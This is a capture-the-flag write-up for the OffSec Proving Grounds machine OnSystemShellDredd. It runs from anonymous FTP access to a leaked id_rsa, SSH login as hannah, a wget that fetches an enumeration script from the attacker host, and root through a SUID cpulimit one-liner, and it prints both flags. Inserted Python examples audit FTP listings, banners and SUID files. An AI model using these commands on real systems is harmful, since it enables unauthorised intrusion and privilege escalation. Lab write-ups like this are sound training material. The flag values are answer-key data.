
OnSystemShellDredd

This is my write-up for OnSystemShellDredd on the OffSec Proving Grounds.

This room is a CTF-style room.

I will try to go deep into the technical details of what we do in this room.


1. Enum

  • Start the machine and get the IP

Machine IP

  • Export the IP as a shell variable so we can reuse it more easily
export IP=192.168.73.130;clear

## Test to see if the IP is correct
echo $IP
  • Start our usual port scans
nmap -sC -sV $IP
rustscan -a $IP

Nmap default scan result
PORT    STATE    SERVICE   VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.73
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Rustscan result
PORT      STATE SERVICE REASON
21/tcp open ftp syn-ack
61000/tcp open unknown syn-ack
  • Let's check out the FTP server
ftp -p $IP
Connected to 192.168.73.130.
220 (vsFTPd 3.0.3)
Name (192.168.73.130:minhnq): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
---
ftp> ls -la
229 Entering Extended Passive Mode (|||26474|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 115 4096 Aug 06 2020 .
drwxr-xr-x 3 0 115 4096 Aug 06 2020 ..
drwxr-xr-x 2 0 0 4096 Aug 06 2020 .hannah
226 Directory send OK.
---
ftp> cd .hannah
250 Directory successfully changed.
---
ftp> ls -la
229 Entering Extended Passive Mode (|||55941|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Aug 06 2020 .
drwxr-xr-x 3 0 115 4096 Aug 06 2020 ..
-rwxr-xr-x 1 0 0 1823 Aug 06 2020 id_rsa
226 Directory send OK.
---
ftp> get id_rsa
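The anonymous FTP walk above is exactly the kind of exposure an administrator should be checking for on their own servers before someone else does. The following is an added example (not code from the original write-up): a parser for the UNIX-style listing vsftpd returns, a check that flags hidden directories and key-like filenames, and a hypothetical `audit_anonymous_ftp` helper that repeats the walk live with `ftplib`. The sample listing lines are copied from the write-up's own output.

```python
"""Parse a UNIX-style FTP directory listing and flag what anonymous users can reach.

Added example, not part of the original write-up. The LISTING_* constants are
the listing lines shown in the write-up; audit_anonymous_ftp (hypothetical
name) repeats the same walk against a live server using ftplib.
"""
import re
from dataclasses import dataclass
from ftplib import FTP

# One "ls -la" style line: perms, link count, uid, gid, size, date, name
LISTING_RE = re.compile(
    r"^(?P<perms>[-dl][rwxsStT-]{9})\s+(?P<links>\d+)\s+(?P<uid>\S+)\s+(?P<gid>\S+)\s+"
    r"(?P<size>\d+)\s+(?P<date>\w{3}\s+\d{1,2}\s+(?:\d{4}|\d{2}:\d{2}))\s+(?P<name>.+)$"
)

# Filenames that should never be readable by anonymous users
SENSITIVE_NAME_RE = re.compile(r"(^id_(rsa|dsa|ecdsa|ed25519)$|\.pem$|\.key$|^\.?(bash_)?history$)")

# Constructed from the write-up's "ls -la" output (root listing and .hannah)
LISTING_ROOT = [
    "drwxr-xr-x 3 0 115 4096 Aug 06 2020 .",
    "drwxr-xr-x 3 0 115 4096 Aug 06 2020 ..",
    "drwxr-xr-x 2 0 0 4096 Aug 06 2020 .hannah",
]
LISTING_HANNAH = ["-rwxr-xr-x 1 0 0 1823 Aug 06 2020 id_rsa"]


@dataclass
class Entry:
    perms: str
    uid: str
    gid: str
    size: int
    name: str

    @property
    def is_dir(self) -> bool:
        return self.perms.startswith("d")

    @property
    def is_hidden(self) -> bool:
        return self.name.startswith(".") and self.name not in (".", "..")


def parse_listing(lines):
    """Turn LIST output lines into Entry objects; FTP status lines are skipped."""
    entries = []
    for line in lines:
        m = LISTING_RE.match(line.strip())
        if not m:
            continue  # e.g. "150 Here comes the directory listing."
        entries.append(Entry(m["perms"], m["uid"], m["gid"], int(m["size"]), m["name"]))
    return entries


def find_exposed(entries, path="/"):
    """Return (full_path, reason) tuples for entries that deserve a closer look."""
    findings = []
    for e in entries:
        full = path.rstrip("/") + "/" + e.name
        if e.is_hidden and e.is_dir:
            findings.append((full, "hidden directory reachable by anonymous users"))
        if not e.is_dir and SENSITIVE_NAME_RE.search(e.name):
            findings.append((full, "sensitive filename"))
    return findings


def audit_anonymous_ftp(host, port=21, max_depth=3):
    """Hypothetical helper: log in anonymously and walk the tree (opens network connections)."""
    ftp = FTP()
    ftp.connect(host, port, timeout=10)
    ftp.login()  # anonymous login, same as the write-up
    findings = []

    def walk(path, depth):
        lines = []
        ftp.dir("-la", path, lines.append)  # sends "LIST -la <path>", hidden entries included
        entries = parse_listing(lines)
        findings.extend(find_exposed(entries, path))
        if depth < max_depth:
            for e in entries:
                if e.is_dir and e.name not in (".", ".."):
                    walk(path.rstrip("/") + "/" + e.name, depth + 1)

    walk("/", 0)
    ftp.quit()
    return findings


if __name__ == "__main__":
    for finding in find_exposed(parse_listing(LISTING_ROOT)) + find_exposed(parse_listing(LISTING_HANNAH), "/.hannah"):
        print(finding)
```

Run against the write-up's listing the parser reports the hidden `.hannah` directory and then the `id_rsa` inside it; the usual fix on the server side is to disable anonymous login (`anonymous_enable=NO` in vsftpd.conf) or to keep the anonymous root free of anything but intentionally public files.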

2. Foothold

  • We got ourselves an id_rsa belonging to hannah. Give the file the correct permissions (600), then we can try to log in over SSH as her
chmod 600 id_rsa
ssh -i id_rsa hannah@$IP -p 61000
Why port 61000, you might ask?
  • From the rustscan result at the start, only two ports are open, 21 and 61000, so it is a reasonable guess that port 61000 is running SSH, right?

  • Or we can check the service on port 61000 with a quick banner grab

nc -v $IP 61000
192.168.73.130: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.73.130] 61000 (?) open
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
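The banner `nc` printed is the SSH identification string defined in RFC 4253 section 4.2 (`SSH-protoversion-softwareversion SP comments`), which is why a service on a non-standard port can be identified from a single line. The following is an added example, not code from the write-up: `grab_banner` does what the `nc` command does, `identify` recognises both banners seen on this box (the vsftpd `220` greeting and the OpenSSH string), and `parse_ssh_banner` breaks the SSH line into its fields so a scanner or inventory script can record the version. It goes slightly beyond the write-up in handling the FTP greeting as well.

```python
"""Grab a service banner and parse SSH / FTP greetings.

Added example, not from the original write-up. SAMPLE_SSH and SAMPLE_FTP are
the banners shown in the write-up; grab_banner opens a TCP connection like the
nc command and is the only function that touches the network.
"""
import re
import socket

# RFC 4253 4.2: SSH-protoversion-softwareversion SP comments CR LF
SSH_BANNER_RE = re.compile(r"^SSH-(?P<proto>\d\.\d+)-(?P<software>\S+)(?: (?P<comments>.*))?$")
# RFC 959 greeting: "220" followed by a space (or "-" for multi-line) and free text
FTP_BANNER_RE = re.compile(r"^220[ -](?P<msg>.*)$")
OPENSSH_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)")

# Constructed from the write-up's output
SAMPLE_SSH = b"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2\r\n"
SAMPLE_FTP = b"220 (vsFTPd 3.0.3)\r\n"


def grab_banner(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Connect and read whatever the server sends first (SSH and FTP both speak first)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(256)


def parse_ssh_banner(raw: bytes) -> dict:
    """Return proto/software/comments from an SSH identification string.

    RFC 4253 allows a server to send other lines before the identification
    line, so every line is tried and only the one starting with "SSH-" counts.
    """
    for line in raw.decode("ascii", errors="replace").splitlines():
        m = SSH_BANNER_RE.match(line.strip())
        if m:
            return {"proto": m["proto"], "software": m["software"], "comments": m["comments"]}
    raise ValueError("no SSH identification line found")


def openssh_version(software: str):
    """(major, minor) for a string like 'OpenSSH_7.9p1'; None for other software."""
    m = OPENSSH_RE.match(software)
    return (int(m[1]), int(m[2])) if m else None


def identify(raw: bytes):
    """Classify a banner as ('ssh', fields), ('ftp', greeting) or ('unknown', None)."""
    text = raw.decode("ascii", errors="replace")
    try:
        return "ssh", parse_ssh_banner(raw)
    except ValueError:
        pass
    for line in text.splitlines():
        m = FTP_BANNER_RE.match(line.strip())
        if m:
            return "ftp", m["msg"]
    return "unknown", None


if __name__ == "__main__":
    for sample in (SAMPLE_SSH, SAMPLE_FTP, b"HTTP/1.0 400 Bad Request\r\n"):
        print(identify(sample))
```

For a live check, `identify(grab_banner("192.168.73.130", 61000))` returns the same result as the `nc` output above. Note that HTTP servers do not speak first, so `grab_banner` alone will time out on them; that is a property of the protocol, not a closed port.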
  • Let's move on. We should upload the pee.sh script to the target machine and run it to find any interesting information that can help us become root
## On kali machine
python3 -m http.server 88

## On target machine
cd /dev/shm
wget 192.168.49.73:88/pee.sh
chmod +x pee.sh
./pee.sh
pee.sh result
[+] Looking for all SUID files: 
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/cpulimit
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mawk
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount
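The SUID list is the key finding here, and the way to read it is by difference: most of those binaries carry the setuid bit on every Debian install, and the ones that do not are the ones to look up. The following is an added example, not part of the write-up or of pee.sh: `walk_suid` reproduces the "[+] Looking for all SUID files" check with `os.lstat`, and `unexpected_suid` diffs a list of paths against a baseline. `BASELINE` is an assumption on my part (binaries that normally carry the SUID bit on a stock Debian 10 install); `SAMPLE_FINDINGS` is the list from the write-up.

```python
"""Enumerate SUID binaries and diff them against an expected baseline.

Added example, not from the original write-up or from pee.sh. BASELINE is an
assumed set of binaries that are SUID on a stock Debian 10 install;
SAMPLE_FINDINGS is the list the write-up's pee.sh run produced.
"""
import os
import stat
from typing import Iterable, Iterator, List, Tuple

# Assumption: the setuid binaries present on a fresh Debian 10 install
BASELINE = {
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/fusermount", "/usr/bin/gpasswd",
    "/usr/bin/mount", "/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/su",
    "/usr/bin/umount", "/usr/bin/sudo",
}

# Copied from the write-up's pee.sh output
SAMPLE_FINDINGS = [
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/cpulimit", "/usr/bin/fusermount",
    "/usr/bin/gpasswd", "/usr/bin/mawk", "/usr/bin/mount", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/umount",
]

# Pseudo filesystems that are pointless (and slow) to walk
PRUNE = {"/proc", "/sys", "/dev", "/run"}


def walk_suid(root: str = "/") -> Iterator[Tuple[str, int]]:
    """Yield (path, owner_uid) for every regular file under root with the setuid bit.

    Equivalent to `find / -perm -4000 -type f`; lstat is used so symlinks are
    judged by their own mode and never followed.
    """
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if os.path.normpath(dirpath) in PRUNE:
            dirnames[:] = []  # do not descend
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; not our problem here
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_uid


def unexpected_suid(paths: Iterable[str], baseline=BASELINE) -> List[str]:
    """Sorted SUID paths that are not in the baseline; each of these needs a review."""
    return sorted(set(paths) - set(baseline))


def root_owned_only(entries: Iterable[Tuple[str, int]]) -> List[str]:
    """Keep only root-owned SUID files: a setuid bit on a non-root file grants far less."""
    return [path for path, uid in entries if uid == 0]


if __name__ == "__main__":
    # Offline run over the write-up's list; replace with walk_suid("/") on a real host
    for path in unexpected_suid(SAMPLE_FINDINGS):
        print("review:", path)
```

On the write-up's list this flags `/usr/bin/cpulimit` and `/usr/bin/mawk` as outside the baseline; the GTFOBins lookup the next section does for cpulimit is the review step, and removing the bit (`chmod u-s`) is the fix for anything that does not genuinely need it. Running the same diff from a cron job and alerting on a non-empty result is a cheap way to catch a newly set SUID bit on a fleet.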

3. PrivEsc

  • From our friend GTFOBins we can see that cpulimit is exploitable when it has the SUID bit set
Become root
cpulimit -l 100 -f -- /bin/sh -p
Process 1208 detected
# whoami
root
Get the flags
cat /home/hannah/local.txt /root/proof.txt
805f80ee0987338811d559374aff6a6f
a8675e7ab8e8deb96cd898ec90df64fc